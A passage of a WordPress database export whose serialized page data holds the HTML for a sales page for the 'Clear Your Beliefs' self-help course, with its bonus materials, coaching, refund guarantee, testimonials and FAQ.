are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>” \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. \n\nIt’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You’ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n<ul>\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\n	<li><strong>Optional:</strong> Professional Coaching Sessions.</li>\n</ul>\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\n<div style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb-purch">\n\n&nbsp;\n\n<a href="https://beliefcloset.infusionsoft.com/app/orderForms/1101aa80-782e-4650-acb8-2f1ae88e2cbd"><button class="btn first" style="padding: 10px 20px;">Purchase</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n<strong>Q: What is a virtual course?</strong>\n\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\n\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\n\n<strong>Q: How long will I have access to the course?</strong>\n\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\n\n<strong>Q: Are there scholarships available?</strong>\n\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\n\n<strong>Q: What is your refund policy?</strong>\n\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\n\n<strong>Q: How can I reach Customer Support?</strong>\n\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\n\n<strong>Q: What is your Privacy Policy?</strong>\n\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\n\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\n\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\n// ]]></script>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"20";s:4:"cell";s:1:"0";s:2:"id";s:2:"26";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:21:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"2";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"3";}i:7;a:1:{s:5:"cells";s:1:"1";}i:8;a:1:{s:5:"cells";s:1:"1";}i:9;a:1:{s:5:"cells";s:1:"1";}i:10;a:1:{s:5:"cells";s:1:"1";}i:11;a:1:{s:5:"cells";s:1:"2";}i:12;a:1:{s:5:"cells";s:1:"1";}i:13;a:1:{s:5:"cells";s:1:"1";}i:14;a:1:{s:5:"cells";s:1:"1";}i:15;a:1:{s:5:"cells";s:1:"1";}i:16;a:1:{s:5:"cells";s:1:"1";}i:17;a:1:{s:5:"cells";s:1:"1";}i:18;a:1:{s:5:"cells";s:1:"1";}i:19;a:1:{s:5:"cells";s:1:"1";}i:20;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:27:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.5984943538268507";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:9;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:10;a:2:{s:6:"weight";s:18:"0.8996235884567128";s:4:"grid";s:1:"6";}i:11;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:12;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}i:13;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"8";}i:14;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"9";}i:15;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"10";}i:16;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:2:"11";}i:17;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:2:"11";}i:18;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"12";}i:19;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"13";}i:20;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"14";}i:21;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"15";}i:22;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"16";}i:23;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"17";}i:24;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"18";}i:25;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"19";}i:26;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"20";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1542, 1982, 'panels_data', 'a:3:{s:7:"widgets";a:27:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:650:"<div class="quot custo-quot" style="margin-top: 0px; text-align: center;">\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:95:"<div class="parg-title"><h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:483:"<div class="parg-text"><p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:183:"<div class="parg-img"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"1";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:5:"title";s:0:"";s:4:"text";s:132:"<div class="parg-title"><h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:14:"WP_Widget_Text";}}i:6;a:4:{s:5:"title";s:0:"";s:4:"text";s:322:"<div class="parg-text"><p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:14:"WP_Widget_Text";}}i:7;a:4:{s:5:"title";s:0:"";s:4:"text";s:277:"<div class="parg-text"><p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:14:"WP_Widget_Text";}}i:8;a:4:{s:5:"title";s:0:"";s:4:"text";s:228:"<a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I’m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I’ll get,<br />and how much it costs...</a>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"1";s:2:"id";s:1:"8";s:5:"class";s:14:"WP_Widget_Text";}}i:9;a:4:{s:5:"title";s:0:"";s:4:"text";s:61:"<div class="parg-title"><h1>\nWhy Does This Happen?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:14:"WP_Widget_Text";}}i:10;a:4:{s:5:"title";s:0:"";s:4:"text";s:833:"<div class="parg-img pull-left"><img class=" 